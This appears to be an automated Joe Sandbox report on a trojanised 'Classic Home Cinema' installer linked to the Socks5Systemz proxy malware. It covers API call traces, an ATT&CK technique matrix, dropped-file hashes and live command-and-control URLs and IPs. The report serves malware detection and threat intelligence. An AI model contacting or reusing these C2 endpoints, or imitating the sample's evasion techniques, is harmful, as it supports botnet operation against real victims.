                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_609256E5 sqlite3_bind_int,sqlite3_bind_int64,2_2_609256E5
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_6094B6ED sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,2_2_6094B6ED
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_6092562A sqlite3_bind_blob,2_2_6092562A
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_60925655 sqlite3_bind_null,sqlite3_mutex_leave,2_2_60925655
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_6094C64A sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,2_2_6094C64A
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_609687A7 sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_column_int64,sqlite3_reset,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,2_2_609687A7
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_6095F7F7 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,2_2_6095F7F7
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_6092570B sqlite3_bind_double,sqlite3_mutex_leave,2_2_6092570B
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_6095F772 sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,2_2_6095F772
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_60925778 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_blob,2_2_60925778
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_6090577D sqlite3_bind_parameter_name,2_2_6090577D
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_6094B764 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,2_2_6094B764
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_6090576B sqlite3_bind_parameter_count,2_2_6090576B
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_6094A894 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,2_2_6094A894
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_6095F883 sqlite3_bind_int64,sqlite3_bind_int,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,2_2_6095F883
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_6094C8C2 sqlite3_value_int,sqlite3_value_int,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_null,sqlite3_bind_null,sqlite3_step,sqlite3_reset,2_2_6094C8C2
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_6096281E sqlite3_mprintf,sqlite3_vtab_config,sqlite3_malloc,sqlite3_mprintf,sqlite3_mprintf,sqlite3_errmsg,sqlite3_mprintf,sqlite3_free,sqlite3_mprintf,sqlite3_exec,sqlite3_free,sqlite3_prepare_v2,sqlite3_bind_text,sqlite3_step,sqlite3_column_int64,sqlite3_finalize,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_errmsg,sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_mprintf,sqlite3_free,sqlite3_declare_vtab,sqlite3_errmsg,sqlite3_mprintf,sqlite3_free,2_2_6096281E
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_6096583A memcmp,sqlite3_realloc,qsort,sqlite3_malloc,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_step,sqlite3_reset,2_2_6096583A
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_6095F9AD sqlite3_bind_int,sqlite3_step,sqlite3_column_type,sqlite3_reset,2_2_6095F9AD
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_6094A92B sqlite3_bind_int64,sqlite3_bind_null,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,2_2_6094A92B
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_6090EAE5 sqlite3_transfer_bindings,2_2_6090EAE5
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_6095FB98 sqlite3_value_int,sqlite3_bind_int,sqlite3_bind_value,sqlite3_step,sqlite3_reset,2_2_6095FB98
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_6095ECA6 sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_bind_value,2_2_6095ECA6
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_6095FCCE sqlite3_malloc,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,2_2_6095FCCE
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_6095FDAE sqlite3_malloc,sqlite3_bind_int,sqlite3_step,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_bind_int,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,sqlite3_free,2_2_6095FDAE
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_60966DF1 sqlite3_value_text,sqlite3_mprintf,sqlite3_free,strcmp,sqlite3_free,sqlite3_malloc,sqlite3_bind_int64,sqlite3_step,sqlite3_column_type,sqlite3_reset,sqlite3_column_blob,sqlite3_reset,sqlite3_malloc,sqlite3_free,sqlite3_reset,sqlite3_result_error_code,sqlite3_result_blob,2_2_60966DF1
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_60969D75 sqlite3_bind_int,sqlite3_step,sqlite3_column_int,sqlite3_reset,2_2_60969D75
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_6095FFB2 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_result_error_code,2_2_6095FFB2
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts3
                    Native API
                    1
                    DLL Side-Loading
                    1
                    Exploitation for Privilege Escalation
                    1
                    Deobfuscate/Decode Files or Information
                    1
                    Input Capture
                    1
                    System Time Discovery
                    Remote Services1
                    Archive Collected Data
                    2
                    Ingress Tool Transfer
                    Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts2
                    Command and Scripting Interpreter
                    5
                    Windows Service
                    1
                    DLL Side-Loading
                    3
                    Obfuscated Files or Information
                    LSASS Memory1
                    Account Discovery
                    Remote Desktop Protocol1
                    Input Capture
                    21
                    Encrypted Channel
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts2
                    Service Execution
                    1
                    Bootkit
                    1
                    Access Token Manipulation
                    21
                    Software Packing
                    Security Account Manager2
                    File and Directory Discovery
                    SMB/Windows Admin SharesData from Network Shared Drive1
                    Non-Standard Port
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook5
                    Windows Service
                    1
                    DLL Side-Loading
                    NTDS35
                    System Information Discovery
                    Distributed Component Object ModelInput Capture1
                    Non-Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script2
                    Process Injection
                    1
                    Masquerading
                    LSA Secrets151
                    Security Software Discovery
                    SSHKeylogging12
                    Application Layer Protocol
                    Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts121
                    Virtualization/Sandbox Evasion
                    Cached Domain Credentials1
                    Process Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Access Token Manipulation
                    DCSync121
                    Virtualization/Sandbox Evasion
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
                    Process Injection
                    Proc Filesystem1
                    Application Window Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                    Bootkit
                    /etc/passwd and /etc/shadow3
                    System Owner/User Discovery
                    Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                    System Network Configuration Discovery
                    Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exe100%Joe Sandbox ML
                    C:\ProgramData\ClassicHomeCinema\ClassicHomeCinema.exe100%Joe Sandbox ML
                    C:\ProgramData\ClassicHomeCinema\sqlite3.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.dll (copy)0%ReversingLabs
                    C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\gdiplus.dll (copy)0%ReversingLabs
                    C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\is-0BQ7F.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\is-7MGOG.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\is-E3J5R.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\is-RQ64T.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\is-T75LM.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\msvcp71.dll (copy)0%ReversingLabs
                    C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\msvcr71.dll (copy)0%ReversingLabs
                    C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\sqlite3.dll (copy)0%ReversingLabs
                    C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\uninstall\is-G4VDT.tmp3%ReversingLabs
                    C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\uninstall\unins000.exe (copy)3%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\is-DJUE0.tmp\_isetup\_iscrypt.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\is-DJUE0.tmp\_isetup\_setup64.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\is-DJUE0.tmp\_isetup\_shfoldr.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmp3%ReversingLabs
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    No contacted domains info
                    NameMaliciousAntivirus DetectionReputation
                    https://188.119.66.185/ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946e44be43869e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73989d4da9c5bfalse
                      unknown
                      https://188.119.66.185/ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b82a8dcd6c946851e30088883250aa15d105633775b0e650f2ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda3a2119db388afalse
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.innosetup.com/EQ5Vcf19u8.tmp, EQ5Vcf19u8.tmp, 00000001.00000000.1694958711.0000000000401000.00000020.00000001.01000000.00000004.sdmp, EQ5Vcf19u8.tmp.0.dr, is-G4VDT.tmp.1.drfalse
                          high
                          https://188.119.66.185/ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b82a8dcd6c946851e3008888325classichomecinema.exe, 00000002.00000002.3555336843.000000000098F000.00000004.00000020.00020000.00000000.sdmpfalse
                            unknown
                            http://www.remobjects.com/psUEQ5Vcf19u8.exe, 00000000.00000003.1694370826.0000000002088000.00000004.00001000.00020000.00000000.sdmp, EQ5Vcf19u8.exe, 00000000.00000003.1694235169.0000000002300000.00000004.00001000.00020000.00000000.sdmp, EQ5Vcf19u8.tmp, 00000001.00000000.1694958711.0000000000401000.00000020.00000001.01000000.00000004.sdmp, EQ5Vcf19u8.tmp.0.dr, is-G4VDT.tmp.1.drfalse
                              high
                              https://188.119.66.185/priseCertificatesclassichomecinema.exe, 00000002.00000002.3555336843.000000000098F000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://188.119.66.185/ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946e44be43869e7c4classichomecinema.exe, 00000002.00000002.3556348800.00000000033EE000.00000004.00000020.00020000.00000000.sdmp, classichomecinema.exe, 00000002.00000002.3555336843.000000000098F000.00000004.00000020.00020000.00000000.sdmpfalse
                                  unknown
                                  http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupUEQ5Vcf19u8.exefalse
                                    high
                                    https://188.119.66.185/classichomecinema.exe, 00000002.00000002.3556348800.00000000033EE000.00000004.00000020.00020000.00000000.sdmp, classichomecinema.exe, 00000002.00000002.3555336843.000000000098F000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineEQ5Vcf19u8.exefalse
                                        high
                                        https://188.119.66.185/aclassichomecinema.exe, 00000002.00000002.3555336843.000000000098F000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          http://www.remobjects.com/psEQ5Vcf19u8.exe, 00000000.00000003.1694370826.0000000002088000.00000004.00001000.00020000.00000000.sdmp, EQ5Vcf19u8.exe, 00000000.00000003.1694235169.0000000002300000.00000004.00001000.00020000.00000000.sdmp, EQ5Vcf19u8.tmp, EQ5Vcf19u8.tmp, 00000001.00000000.1694958711.0000000000401000.00000020.00000001.01000000.00000004.sdmp, EQ5Vcf19u8.tmp.0.dr, is-G4VDT.tmp.1.drfalse
                                            high
                                            https://www.easycutstudio.com/support.htmlEQ5Vcf19u8.exe, 00000000.00000002.3555201992.0000000002081000.00000004.00001000.00020000.00000000.sdmp, EQ5Vcf19u8.exe, 00000000.00000003.1693888335.0000000002300000.00000004.00001000.00020000.00000000.sdmp, EQ5Vcf19u8.exe, 00000000.00000003.1693955102.0000000002081000.00000004.00001000.00020000.00000000.sdmp, EQ5Vcf19u8.tmp, 00000001.00000003.1695608267.0000000003100000.00000004.00001000.00020000.00000000.sdmp, EQ5Vcf19u8.tmp, 00000001.00000002.3555541276.0000000002128000.00000004.00001000.00020000.00000000.sdmp, EQ5Vcf19u8.tmp, 00000001.00000002.3555255376.000000000068B000.00000004.00000020.00020000.00000000.sdmp, EQ5Vcf19u8.tmp, 00000001.00000003.1695670125.0000000002128000.00000004.00001000.00020000.00000000.sdmpfalse
                                              high
                                              https://188.119.66.185/jclassichomecinema.exe, 00000002.00000002.3555336843.000000000098F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                https://188.119.66.185/allowedCert_OS_1classichomecinema.exe, 00000002.00000002.3556348800.00000000033EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs
                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  31.214.157.206
                                                  unknownGermany
                                                  58329RACKPLACEDEfalse
                                                  188.119.66.185
                                                  unknownRussian Federation
                                                  209499FLYNETRUfalse
                                                  Joe Sandbox version:41.0.0 Charoite
                                                  Analysis ID:1579844
                                                  Start date and time:2024-12-23 11:46:11 +01:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 7m 13s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Run name:Run with higher sleep bypass
                                                  Number of analysed new started processes analysed:7
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample name:EQ5Vcf19u8.exe
                                                  renamed because original name is a hash value
                                                  Original Sample Name:9fbf70243a3e4aca45a6d0af87749833e506c5a3eacdbc449525bc5f62835ba6
                                                  Detection:MAL
                                                  Classification:mal80.troj.evad.winEXE@5/26@0/2
                                                  EGA Information:
                                                  • Successful, ratio: 100%
                                                  HCA Information:
                                                  • Successful, ratio: 93%
                                                  • Number of executed functions: 194
                                                  • Number of non-executed functions: 269
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .exe
                                                  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                  • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                  • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.63
                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • VT rate limit hit for: EQ5Vcf19u8.exe
                                                  No simulations
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  31.214.157.206Oz2UhFBTHy.exeGet hashmaliciousSocks5SystemzBrowse
                                                  • 200
                                                  188.119.66.185vwZcJ81cpN.exeGet hashmaliciousSocks5SystemzBrowse
                                                    vwZcJ81cpN.exeGet hashmaliciousSocks5SystemzBrowse
                                                      r4xiHKy8aM.exeGet hashmaliciousSocks5SystemzBrowse
                                                        gjEtERlBSv.exeGet hashmaliciousSocks5SystemzBrowse
                                                          gjEtERlBSv.exeGet hashmaliciousSocks5SystemzBrowse
                                                            Hbq580QZAR.exeGet hashmaliciousSocks5SystemzBrowse
                                                              steel.exe.2.exeGet hashmaliciousSocks5SystemzBrowse
                                                                stories.exe.2.exeGet hashmaliciousSocks5SystemzBrowse
                                                                  basx.exeGet hashmaliciousSocks5SystemzBrowse
                                                                    No context
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    RACKPLACEDEgjEtERlBSv.exeGet hashmaliciousSocks5SystemzBrowse
                                                                    • 31.214.157.206
                                                                    Hbq580QZAR.exeGet hashmaliciousSocks5SystemzBrowse
                                                                    • 31.214.157.206
                                                                    Oz2UhFBTHy.exeGet hashmaliciousSocks5SystemzBrowse
                                                                    • 31.214.157.226
                                                                    GEm3o8pION.exeGet hashmaliciousSocks5SystemzBrowse
                                                                    • 31.214.157.206
                                                                    bzX2pV3Ybw.exeGet hashmaliciousSocks5SystemzBrowse
                                                                    • 31.214.157.206
                                                                    Ni2ghr9eUJ.exeGet hashmaliciousSocks5SystemzBrowse
                                                                    • 31.214.157.206
                                                                    Ni2ghr9eUJ.exeGet hashmaliciousSocks5SystemzBrowse
                                                                    • 31.214.157.206
                                                                    2mtt3zE6Vh.exeGet hashmaliciousSocks5SystemzBrowse
                                                                    • 31.214.157.206
                                                                    7i6bUvYZ4L.exeGet hashmaliciousSocks5SystemzBrowse
                                                                    • 31.214.157.206
                                                                    FLYNETRUvwZcJ81cpN.exeGet hashmaliciousSocks5SystemzBrowse
                                                                    • 188.119.66.185
                                                                    vwZcJ81cpN.exeGet hashmaliciousSocks5SystemzBrowse
                                                                    • 188.119.66.185
                                                                    r4xiHKy8aM.exeGet hashmaliciousSocks5SystemzBrowse
                                                                    • 188.119.66.185
                                                                    gjEtERlBSv.exeGet hashmaliciousSocks5SystemzBrowse
                                                                    • 188.119.66.185
                                                                    gjEtERlBSv.exeGet hashmaliciousSocks5SystemzBrowse
                                                                    • 188.119.66.185
                                                                    https://drive.google.com/file/d/1zySfUjQ3GqIVAlBHIX3CXdgIcWIqrMkO/view?usp=sharing_eip&ts=67645d30Get hashmaliciousUnknownBrowse
                                                                    • 188.119.66.154
                                                                    https://drive.google.com/file/d/1zySfUjQ3GqIVAlBHIX3CXdgIcWIqrMkO/view?usp=sharing_eil&ts=67645d30Get hashmaliciousUnknownBrowse
                                                                    • 188.119.66.154
                                                                    Hbq580QZAR.exeGet hashmaliciousSocks5SystemzBrowse
                                                                    • 188.119.66.185
                                                                    steel.exe.2.exeGet hashmaliciousSocks5SystemzBrowse
                                                                    • 188.119.66.185
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    51c64c77e60f3980eea90869b68c58a8vwZcJ81cpN.exeGet hashmaliciousSocks5SystemzBrowse
                                                                    • 188.119.66.185
                                                                    vwZcJ81cpN.exeGet hashmaliciousSocks5SystemzBrowse
                                                                    • 188.119.66.185
                                                                    r4xiHKy8aM.exeGet hashmaliciousSocks5SystemzBrowse
                                                                    • 188.119.66.185
                                                                    gjEtERlBSv.exeGet hashmaliciousSocks5SystemzBrowse
                                                                    • 188.119.66.185
                                                                    gjEtERlBSv.exeGet hashmaliciousSocks5SystemzBrowse
                                                                    • 188.119.66.185
                                                                    WindowsUpdate.exeGet hashmaliciousUnknownBrowse
                                                                    • 188.119.66.185
                                                                    Hbq580QZAR.exeGet hashmaliciousSocks5SystemzBrowse
                                                                    • 188.119.66.185
                                                                    steel.exe.2.exeGet hashmaliciousSocks5SystemzBrowse
                                                                    • 188.119.66.185
                                                                    stories.exe.2.exeGet hashmaliciousSocks5SystemzBrowse
                                                                    • 188.119.66.185
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    C:\ProgramData\ClassicHomeCinema\sqlite3.dllvwZcJ81cpN.exeGet hashmaliciousSocks5SystemzBrowse
                                                                      vwZcJ81cpN.exeGet hashmaliciousSocks5SystemzBrowse
                                                                        r4xiHKy8aM.exeGet hashmaliciousSocks5SystemzBrowse
                                                                          gjEtERlBSv.exeGet hashmaliciousSocks5SystemzBrowse
                                                                            gjEtERlBSv.exeGet hashmaliciousSocks5SystemzBrowse
                                                                              Hbq580QZAR.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                steel.exe.2.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                  stories.exe.2.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                    basx.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                      Process:C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):2776237
                                                                                      Entropy (8bit):6.89792615350219
                                                                                      Encrypted:false
                                                                                      SSDEEP:49152:eyMXRWKguE94xBxa9412CZNTPpvyin/ciJQQdR:hlBu04v09412CbTxZ/cXg
                                                                                      MD5:765448A33166E70D7C75392D7E8FC161
                                                                                      SHA1:6EFD4DCAC1045792CBC34AC0DF7B71DDD887468C
                                                                                      SHA-256:B10B4798571466E062ED070548787DC205D774041D593197183BD68544420739
                                                                                      SHA-512:F71113152642359675CDBB0A6FEF08F0922CC978A2909DEBAE0C689145DBFCD2079673E91CDCF32F9B581AF175F08068559D6D284F838D71FE1D3035963B8C96
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\ClassicHomeCinema\ClassicHomeCinema.exe, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      Reputation:low
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................PE..L....5ig.....................J.......V............@...........................*.......*..............................................`..................................................................................H............................amtt4..:........................... ..`.antt4...4.......6..................@..@.aott4...e.......2..................@....rsrc........`......................@..@.aptt4..............................`.0.........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):645592
                                                                                      Entropy (8bit):6.50414583238337
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                                      MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                                      SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                                      SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                                                      SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Joe Sandbox View:
                                                                                      • Filename: vwZcJ81cpN.exe, Detection: malicious, Browse
                                                                                      • Filename: vwZcJ81cpN.exe, Detection: malicious, Browse
                                                                                      • Filename: r4xiHKy8aM.exe, Detection: malicious, Browse
                                                                                      • Filename: gjEtERlBSv.exe, Detection: malicious, Browse
                                                                                      • Filename: gjEtERlBSv.exe, Detection: malicious, Browse
                                                                                      • Filename: Hbq580QZAR.exe, Detection: malicious, Browse
                                                                                      • Filename: steel.exe.2.exe, Detection: malicious, Browse
                                                                                      • Filename: stories.exe.2.exe, Detection: malicious, Browse
                                                                                      • Filename: basx.exe, Detection: malicious, Browse
                                                                                      Reputation:high, very likely benign file
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..
                                                                                      Process:C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exe
                                                                                      File Type:ISO-8859 text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):8
                                                                                      Entropy (8bit):2.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:bm/l:G
                                                                                      MD5:53117268CBF15BE379F35C66B2C51E77
                                                                                      SHA1:ED6585067D4F1126B61B2AA138FEFD6F057D388D
                                                                                      SHA-256:63B281F09325232AC56F02A5646718E71908D21025B4176E8A33915445C072BA
